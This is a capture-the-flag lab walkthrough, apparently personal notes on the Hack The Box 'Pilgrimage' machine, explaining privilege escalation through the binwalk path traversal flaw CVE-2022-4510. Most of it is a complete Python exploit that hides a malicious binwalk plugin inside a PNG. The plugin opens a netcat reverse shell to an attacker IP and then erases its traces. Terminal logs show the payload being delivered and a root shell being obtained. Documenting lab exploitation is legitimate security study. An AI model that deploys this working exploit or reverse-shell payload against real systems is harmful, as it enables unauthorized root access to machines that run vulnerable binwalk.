CVE-2022-4510

a vulnerability was found in refirm binwalk up to 2.3.2. It has been declared as critical. Affected by this vulnerability is an unknown part of the file src/binwalk/plugins/unpfs.py of the component PFS Extractor. The manipulation with an unknown input leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22. The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit

While the initial PoC was disclosed in the official binwalk’s GitHub repo, there is a Python script available

import os
import inspect
import argparse
 
print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")
 
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)
 
args = parser.parse_args()
            
if args.file and args.ip and args.port:
    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
    lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n','    def init(self):\n','        if not os.path.exists("/tmp/.binwalk"):\n','            os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n','            with open("/tmp/.binwalk", "w") as f:\n','                f.write("1")\n','        else:\n','            os.remove("/tmp/.binwalk")\n', '            os.remove(os.path.abspath(__file__))\n','            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']
 
    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()
    
    with open("/tmp/plugin", "w") as f:
       for line in lines:
          f.write(line)
 
    with open("/tmp/plugin", "rb") as f: 
        content = f.read()
 
    os.system("rm /tmp/plugin")
 
    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)
 
    print("")    
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-4510]
└─$ nc $IP 2222 < CVE-2022-4510.py
 
emily@pilgrimage:~$ nc -nlvp 2222 > CVE-2022-4510.py
listening on [any] 2222 ...
connect to [10.10.11.219] from (UNKNOWN) [10.10.14.4] 54546

Delivery complete

emily@pilgrimage:~$ python3 CVE-2022-4510.py -h
 
[...REDACTED...]
 
usage: CVE-2022-4510.py [-h] file ip port
 
positional arguments:
  file        Path to input .png file
  ip          Ip to nc listener
  port        Port to nc listener
 
optional arguments:
  -h, --help  show this help message and exit

The exploit requires an arbitrary PNG file to write a reverse shell to

emily@pilgrimage:~$ touch abc.png

So I will just make one

emily@pilgrimage:~$ python3 CVE-2022-4510.py abc.png 10.10.14.4 1234
 
[...REDACTED...]
 
You can now rename and share binwalk_exploit and start your local netcat listener.

It says that I can now rename, share binwalk_exploit and start a Netcat listener

It indeed generated the exploit PNG payload

emily@pilgrimage:~$ cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/

Moving the payload to where the malwarescan.sh script is running

┌──(kali㉿kali)-[~/archive/htb/labs/pilgrimage]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.219] 51952
whoami
root
hostname
pilgrimage
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:be:8c brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever

System Level Compromise

InfoSec LAB

Explorer

Pilgrimage_Privilege_Escalation

CVE-2022-4510

Exploit

Exploitation

Interactive Graph View

Table of Contents

Backlinks